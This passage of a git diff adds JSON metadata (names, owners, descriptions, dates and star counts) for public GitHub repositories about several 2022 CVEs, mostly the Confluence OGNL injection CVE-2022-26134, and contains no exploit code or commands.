"CVE-2022-2588", + "full_name": "PolymorphicOpcode\/CVE-2022-2588", + "owner": { + "login": "PolymorphicOpcode", + "id": 46855517, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46855517?v=4", + "html_url": "https:\/\/github.com\/PolymorphicOpcode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PolymorphicOpcode\/CVE-2022-2588", + "description": "A PoC for CVE-2022-2588 that triggers a WARNING", + "fork": false, + "created_at": "2022-09-18T21:35:19Z", + "updated_at": "2024-08-12T20:27:09Z", + "pushed_at": "2022-09-28T22:33:17Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 574255247, + "name": "CVE-2022-2588", + "full_name": "BassamGraini\/CVE-2022-2588", + "owner": { + "login": "BassamGraini", + "id": 71853669, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71853669?v=4", + "html_url": "https:\/\/github.com\/BassamGraini", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BassamGraini\/CVE-2022-2588", + "description": null, + "fork": false, + "created_at": "2022-12-04T22:10:57Z", + "updated_at": "2024-10-21T03:18:10Z", + "pushed_at": "2022-12-16T01:03:41Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 608527042, + "name": "CVE-2022-2588", + "full_name": "veritas501\/CVE-2022-2588", + "owner": { + "login": "veritas501", + "id": 25763545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4", + "html_url": "https:\/\/github.com\/veritas501", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/veritas501\/CVE-2022-2588", + "description": "CVE-2022-2588", + "fork": false, + "created_at": "2023-03-02T07:45:22Z", + "updated_at": "2024-04-02T17:41:00Z", + "pushed_at": "2023-08-22T11:19:28Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 611941666, + "name": "CVE-2022-2588", + "full_name": "dom4570\/CVE-2022-2588", + "owner": { + "login": "dom4570", + "id": 70895650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70895650?v=4", + "html_url": "https:\/\/github.com\/dom4570", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dom4570\/CVE-2022-2588", + "description": null, + "fork": false, + "created_at": "2023-03-09T21:29:56Z", + "updated_at": "2023-03-09T21:30:56Z", + "pushed_at": "2023-03-09T21:30:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2590.json b/2022/CVE-2022-2590.json new file mode 100644 index 0000000000..41cd510ca0 --- /dev/null +++ b/2022/CVE-2022-2590.json @@ -0,0 +1,47 @@ +[ + { + "id": 835827416, + "name": "CVE-2022-2590-analysis", + "full_name": "hyeonjun17\/CVE-2022-2590-analysis", + "owner": { + "login": "hyeonjun17", + "id": 69148883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69148883?v=4", + "html_url": "https:\/\/github.com\/hyeonjun17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hyeonjun17\/CVE-2022-2590-analysis", + "description": "Dirty COW restricted to shmem in linux kernel", + "fork": false, + "created_at": "2024-07-30T15:54:07Z", + "updated_at": "2024-07-31T07:03:57Z", + "pushed_at": "2024-07-30T17:31:48Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "1-day", + "analysis", + "cve-2022-2590", + "dirty-cow", + "exploit", + "linux", + "linux-kernel", + "memory-management", + "race-condition", + "security", + "shared-memory", + "userfaultfd", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25927.json b/2022/CVE-2022-25927.json new file mode 100644 index 0000000000..3febb14644 --- /dev/null +++ b/2022/CVE-2022-25927.json @@ -0,0 +1,33 @@ +[ + { + "id": 595917273, + "name": "cve-2022-25927", + "full_name": "masahiro331\/cve-2022-25927", + "owner": { + "login": "masahiro331", + "id": 20438853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20438853?v=4", + "html_url": "https:\/\/github.com\/masahiro331", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/masahiro331\/cve-2022-25927", + "description": null, + "fork": false, + "created_at": "2023-02-01T04:16:47Z", + "updated_at": "2023-02-01T04:18:02Z", + "pushed_at": "2023-02-01T04:17:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25943.json b/2022/CVE-2022-25943.json index b8de7c44dc..5b6cb902ff 100644 --- a/2022/CVE-2022-25943.json +++ b/2022/CVE-2022-25943.json @@ -1,4 +1,35 @@ [ + { + "id": 384572220, + "name": "KINGSOFT-WPS-Office-LPE", + "full_name": "HadiMed\/KINGSOFT-WPS-Office-LPE", + "owner": { + "login": "HadiMed", + "id": 57273771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57273771?v=4", + "html_url": "https:\/\/github.com\/HadiMed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HadiMed\/KINGSOFT-WPS-Office-LPE", + "description": "CVE-2022-25943", + "fork": false, + "created_at": "2021-07-09T23:34:57Z", + "updated_at": "2024-11-02T17:34:01Z", + "pushed_at": "2022-03-09T08:26:45Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 59, + "score": 0, + "subscribers_count": 4 + }, { "id": 484356389, "name": "CVE-2022-25943", diff --git a/2022/CVE-2022-25949.json b/2022/CVE-2022-25949.json new file mode 100644 index 0000000000..352df9f380 --- /dev/null +++ b/2022/CVE-2022-25949.json @@ -0,0 +1,33 @@ +[ + { + "id": 470624137, + "name": "CVE-2022-25949", + "full_name": "tandasat\/CVE-2022-25949", + "owner": { + "login": "tandasat", + "id": 1620923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1620923?v=4", + "html_url": "https:\/\/github.com\/tandasat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tandasat\/CVE-2022-25949", + "description": "A years-old exploit of a local EoP vulnerability in Kingsoft Antivirus KWatch Driver version 2009.3.17.77.", + "fork": false, + "created_at": "2022-03-16T14:42:21Z", + "updated_at": "2024-10-05T16:19:51Z", + "pushed_at": "2022-03-16T19:51:30Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 36, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2602.json b/2022/CVE-2022-2602.json new file mode 100644 index 0000000000..d7c2a67620 --- /dev/null +++ b/2022/CVE-2022-2602.json @@ -0,0 +1,95 @@ +[ + { + "id": 567860169, + "name": "CVE-2022-2602", + "full_name": "LukeGix\/CVE-2022-2602", + "owner": { + "login": "LukeGix", + "id": 80392368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80392368?v=4", + "html_url": "https:\/\/github.com\/LukeGix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LukeGix\/CVE-2022-2602", + "description": "CVE-2022-2602", + "fork": false, + "created_at": "2022-11-18T18:53:27Z", + "updated_at": "2024-05-10T10:47:50Z", + "pushed_at": "2022-12-22T11:21:11Z", + "stargazers_count": 88, + "watchers_count": 88, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 88, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 580378653, + "name": "CVE-2022-2602-Kernel-Exploit", + "full_name": "kiks7\/CVE-2022-2602-Kernel-Exploit", + "owner": { + "login": "kiks7", + "id": 41572858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41572858?v=4", + "html_url": "https:\/\/github.com\/kiks7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kiks7\/CVE-2022-2602-Kernel-Exploit", + "description": null, + "fork": false, + "created_at": "2022-12-20T12:16:38Z", + "updated_at": "2024-09-25T15:06:42Z", + "pushed_at": "2023-01-09T11:28:00Z", + "stargazers_count": 86, + "watchers_count": 86, + "has_discussions": false, + "forks_count": 28, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 28, + "watchers": 86, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 586887875, + "name": "CVE-2022-2602-Study", + "full_name": "th3-5had0w\/CVE-2022-2602-Study", + "owner": { + "login": "th3-5had0w", + "id": 46859830, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46859830?v=4", + "html_url": "https:\/\/github.com\/th3-5had0w", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3-5had0w\/CVE-2022-2602-Study", + "description": null, + "fork": false, + "created_at": "2023-01-09T13:21:02Z", + "updated_at": "2023-05-20T05:45:42Z", + "pushed_at": "2023-01-09T13:22:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26134.json b/2022/CVE-2022-26134.json index 7791b67c27..00175b4839 100644 --- a/2022/CVE-2022-26134.json +++ b/2022/CVE-2022-26134.json @@ -1144,5 +1144,1056 @@ "watchers": 0, "score": 0, "subscribers_count": 1 + }, + { + "id": 510402169, + "name": "TryHackMe-Atlassian-CVE-2022-26134", + "full_name": "r1skkam\/TryHackMe-Atlassian-CVE-2022-26134", + "owner": { + "login": "r1skkam", + "id": 58542375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58542375?v=4", + "html_url": "https:\/\/github.com\/r1skkam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r1skkam\/TryHackMe-Atlassian-CVE-2022-26134", + "description": "Atlassian, CVE-2022-26134 An interactive lab showcasing the Confluence Server and Data Center un-authenticated RCE vulnerability.", + "fork": false, + "created_at": "2022-07-04T15:00:21Z", + "updated_at": "2022-07-19T02:30:51Z", + "pushed_at": "2022-07-04T16:49:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 510586350, + "name": "CVE-2022-26134", + "full_name": "nxtexploit\/CVE-2022-26134", + "owner": { + "login": "nxtexploit", + "id": 72358603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72358603?v=4", + "html_url": "https:\/\/github.com\/nxtexploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nxtexploit\/CVE-2022-26134", + "description": "Atlassian Confluence (CVE-2022-26134) - Unauthenticated Remote code execution (RCE)", + "fork": false, + "created_at": "2022-07-05T04:30:42Z", + "updated_at": "2025-01-01T21:53:03Z", + "pushed_at": "2024-08-23T18:52:52Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian-confluence", + "cve-2022-26134", + "rce", + "remote-code-execution" + ], + "visibility": "public", + "forks": 12, + "watchers": 29, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 510624422, + "name": "CVE-2022-26134", + "full_name": "Debajyoti0-0\/CVE-2022-26134", + "owner": { + "login": "Debajyoti0-0", + "id": 79437050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79437050?v=4", + "html_url": "https:\/\/github.com\/Debajyoti0-0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Debajyoti0-0\/CVE-2022-26134", + "description": "Atlassian Confluence (CVE-2022-26134) - Unauthenticated OGNL injection vulnerability (RCE).", + "fork": false, + "created_at": "2022-07-05T07:04:50Z", + "updated_at": "2024-10-03T05:16:26Z", + "pushed_at": "2022-07-05T09:40:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian-confluence", + "cve-2022-26134", + "infosec", + "ognl-injection-vulnerability", + "payload", + "python", + "rce", + "unauthenticated" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 510946912, + "name": "cve-2022-26134", + "full_name": "f4yd4-s3c\/cve-2022-26134", + "owner": { + "login": "f4yd4-s3c", + "id": 68352308, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68352308?v=4", + "html_url": "https:\/\/github.com\/f4yd4-s3c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f4yd4-s3c\/cve-2022-26134", + "description": null, + "fork": false, + "created_at": "2022-07-06T01:27:21Z", + "updated_at": "2022-07-23T16:53:31Z", + "pushed_at": "2022-08-28T04:05:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 511886087, + "name": "CVE-2022-26134", + "full_name": "coskper-papa\/CVE-2022-26134", + "owner": { + "login": "coskper-papa", + "id": 90187053, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90187053?v=4", + "html_url": "https:\/\/github.com\/coskper-papa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/coskper-papa\/CVE-2022-26134", + "description": "confluence rce", + "fork": false, + "created_at": "2022-07-08T12:24:21Z", + "updated_at": "2024-08-12T20:24:50Z", + "pushed_at": "2022-07-08T12:31:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 513011701, + "name": "confusploit", + "full_name": "p4b3l1t0\/confusploit", + "owner": { + "login": "p4b3l1t0", + "id": 59421032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59421032?v=4", + "html_url": "https:\/\/github.com\/p4b3l1t0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p4b3l1t0\/confusploit", + "description": "This is a python script that can be used with Shodan CLI to mass hunting Confluence Servers vulnerable to CVE-2022-26134", + "fork": false, + "created_at": "2022-07-12T05:34:09Z", + "updated_at": "2023-01-11T20:02:19Z", + "pushed_at": "2024-06-19T00:41:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 513720732, + "name": "CVE-2022-26134-PoC", + "full_name": "twoning\/CVE-2022-26134-PoC", + "owner": { + "login": "twoning", + "id": 107823435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107823435?v=4", + "html_url": "https:\/\/github.com\/twoning", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twoning\/CVE-2022-26134-PoC", + "description": "CVE-2022-26134-PoC", + "fork": false, + "created_at": "2022-07-14T01:28:16Z", + "updated_at": "2022-07-14T10:35:04Z", + "pushed_at": "2022-07-14T01:31:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 514222017, + "name": "cve-2022-26134", + "full_name": "iveresk\/cve-2022-26134", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/cve-2022-26134", + "description": "Just simple PoC for the Atlassian Jira exploit. Provides code execution for unauthorised user on a server.", + "fork": false, + "created_at": "2022-07-15T10:06:15Z", + "updated_at": "2024-02-07T13:03:55Z", + "pushed_at": "2022-07-21T14:24:29Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 517082112, + "name": "CVE-2022-26134", + "full_name": "keven1z\/CVE-2022-26134", + "owner": { + "login": "keven1z", + "id": 43847458, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43847458?v=4", + "html_url": "https:\/\/github.com\/keven1z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keven1z\/CVE-2022-26134", + "description": "远程攻击者在Confluence未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,在现有脚本上修改了poc,方便getshell。", + "fork": false, + "created_at": "2022-07-23T14:38:11Z", + "updated_at": "2022-10-29T13:45:18Z", + "pushed_at": "2022-07-25T05:51:13Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "confluence", + "cve-2022-26134" + ], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 527499750, + "name": "CVE-2022-26134-Console", + "full_name": "shiftsansan\/CVE-2022-26134-Console", + "owner": { + "login": "shiftsansan", + "id": 104987706, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104987706?v=4", + "html_url": "https:\/\/github.com\/shiftsansan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shiftsansan\/CVE-2022-26134-Console", + "description": "CVE-2022-26134-Console", + "fork": false, + "created_at": "2022-08-22T09:40:43Z", + "updated_at": "2024-08-12T20:26:23Z", + "pushed_at": "2022-08-23T11:06:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 529162323, + "name": "CVE-2022-26134web", + "full_name": "1337in\/CVE-2022-26134web", + "owner": { + "login": "1337in", + "id": 32819740, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32819740?v=4", + "html_url": "https:\/\/github.com\/1337in", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1337in\/CVE-2022-26134web", + "description": "CVE-2022-26134 web payload", + "fork": false, + "created_at": "2022-08-26T07:38:29Z", + "updated_at": "2022-08-28T15:03:38Z", + "pushed_at": "2022-08-26T07:40:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 548488626, + "name": "CVE-2022-26134-LAB", + "full_name": "skhalsa-sigsci\/CVE-2022-26134-LAB", + "owner": { + "login": "skhalsa-sigsci", + "id": 68570441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68570441?v=4", + "html_url": "https:\/\/github.com\/skhalsa-sigsci", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skhalsa-sigsci\/CVE-2022-26134-LAB", + "description": "Detecting CVE-2022-26134 using Nuclei", + "fork": false, + "created_at": "2022-10-09T17:15:07Z", + "updated_at": "2023-08-25T22:41:38Z", + "pushed_at": "2022-10-09T17:53:18Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 551806207, + "name": "CVE-2022-26134-cve1", + "full_name": "yigexioabai\/CVE-2022-26134-cve1", + "owner": { + "login": "yigexioabai", + "id": 110800918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110800918?v=4", + "html_url": "https:\/\/github.com\/yigexioabai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yigexioabai\/CVE-2022-26134-cve1", + "description": null, + "fork": false, + "created_at": "2022-10-15T06:01:53Z", + "updated_at": "2022-10-15T14:34:57Z", + "pushed_at": "2022-10-15T14:56:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552009446, + "name": "CVE-2022-26134", + "full_name": "kailing0220\/CVE-2022-26134", + "owner": { + "login": "kailing0220", + "id": 115863969, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115863969?v=4", + "html_url": "https:\/\/github.com\/kailing0220", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kailing0220\/CVE-2022-26134", + "description": "在受影响的Confluence Server 和Data Center 版本中,存在一个OGNL 注入漏洞,该漏洞允许未经身份验证的攻击者在Confluence Server 或Data Center 服务器上执行任意代码。", + "fork": false, + "created_at": "2022-10-15T15:56:41Z", + "updated_at": "2022-11-19T03:07:42Z", + "pushed_at": "2022-10-15T16:07:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552300832, + "name": "ATLASSIAN-Confluence_rce", + "full_name": "xanszZZ\/ATLASSIAN-Confluence_rce", + "owner": { + "login": "xanszZZ", + "id": 115653953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115653953?v=4", + "html_url": "https:\/\/github.com\/xanszZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xanszZZ\/ATLASSIAN-Confluence_rce", + "description": "批量检测CVE-2022-26134 RCE漏洞", + "fork": false, + "created_at": "2022-10-16T09:19:56Z", + "updated_at": "2022-10-17T06:36:47Z", + "pushed_at": "2022-10-16T15:09:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552328370, + "name": "CVE-2022-26134", + "full_name": "kelemaoya\/CVE-2022-26134", + "owner": { + "login": "kelemaoya", + "id": 115539074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115539074?v=4", + "html_url": "https:\/\/github.com\/kelemaoya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kelemaoya\/CVE-2022-26134", + "description": "Confluence Server and Data Center存在一个远程代码执行漏洞,未经身份验证的攻击者可以利用该漏洞向目标服务器注入恶意ONGL表达式,进而在目标服务器上执行任意代码。", + "fork": false, + "created_at": "2022-10-16T10:44:51Z", + "updated_at": "2022-10-18T09:07:52Z", + "pushed_at": "2022-10-16T10:59:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552331644, + "name": "cve-2022-26134", + "full_name": "CJ-0107\/cve-2022-26134", + "owner": { + "login": "CJ-0107", + "id": 112550674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112550674?v=4", + "html_url": "https:\/\/github.com\/CJ-0107", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CJ-0107\/cve-2022-26134", + "description": "cve-2022-26134", + "fork": false, + "created_at": "2022-10-16T10:55:12Z", + "updated_at": "2022-10-16T10:55:56Z", + "pushed_at": "2022-10-16T10:55:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552345477, + "name": "CVE-2022-26134", + "full_name": "latings\/CVE-2022-26134", + "owner": { + "login": "latings", + "id": 112951518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112951518?v=4", + "html_url": "https:\/\/github.com\/latings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/latings\/CVE-2022-26134", + "description": "CVE-2022-26134", + "fork": false, + "created_at": "2022-10-16T11:37:33Z", + "updated_at": "2022-10-16T12:03:51Z", + "pushed_at": "2022-10-16T12:14:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552349055, + "name": "CVE-2022-26134", + "full_name": "yyqxi\/CVE-2022-26134", + "owner": { + "login": "yyqxi", + "id": 115715353, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115715353?v=4", + "html_url": "https:\/\/github.com\/yyqxi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yyqxi\/CVE-2022-26134", + "description": "CVE-2022-26134poc", + "fork": false, + "created_at": "2022-10-16T11:48:42Z", + "updated_at": "2022-10-16T12:08:42Z", + "pushed_at": "2022-10-16T12:08:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 556916436, + "name": "CVE-2022-26134", + "full_name": "b4dboy17\/CVE-2022-26134", + "owner": { + "login": "b4dboy17", + "id": 83988282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83988282?v=4", + "html_url": "https:\/\/github.com\/b4dboy17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b4dboy17\/CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2022-10-24T19:00:25Z", + "updated_at": "2023-02-09T19:30:02Z", + "pushed_at": "2022-10-24T19:03:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 582078950, + "name": "CVE-2022-26134", + "full_name": "wjlin0\/CVE-2022-26134", + "owner": { + "login": "wjlin0", + "id": 91306421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91306421?v=4", + "html_url": "https:\/\/github.com\/wjlin0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wjlin0\/CVE-2022-26134", + "description": "CVE-2022-26134 GO POC 练习", + "fork": false, + "created_at": "2022-12-25T15:29:14Z", + "updated_at": "2022-12-26T05:18:26Z", + "pushed_at": "2022-12-26T05:27:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 589327553, + "name": "CVE-2022-26134_check", + "full_name": "cbk914\/CVE-2022-26134_check", + "owner": { + "login": "cbk914", + "id": 2042196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2042196?v=4", + "html_url": "https:\/\/github.com\/cbk914", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cbk914\/CVE-2022-26134_check", + "description": null, + "fork": false, + "created_at": "2023-01-15T20:11:27Z", + "updated_at": 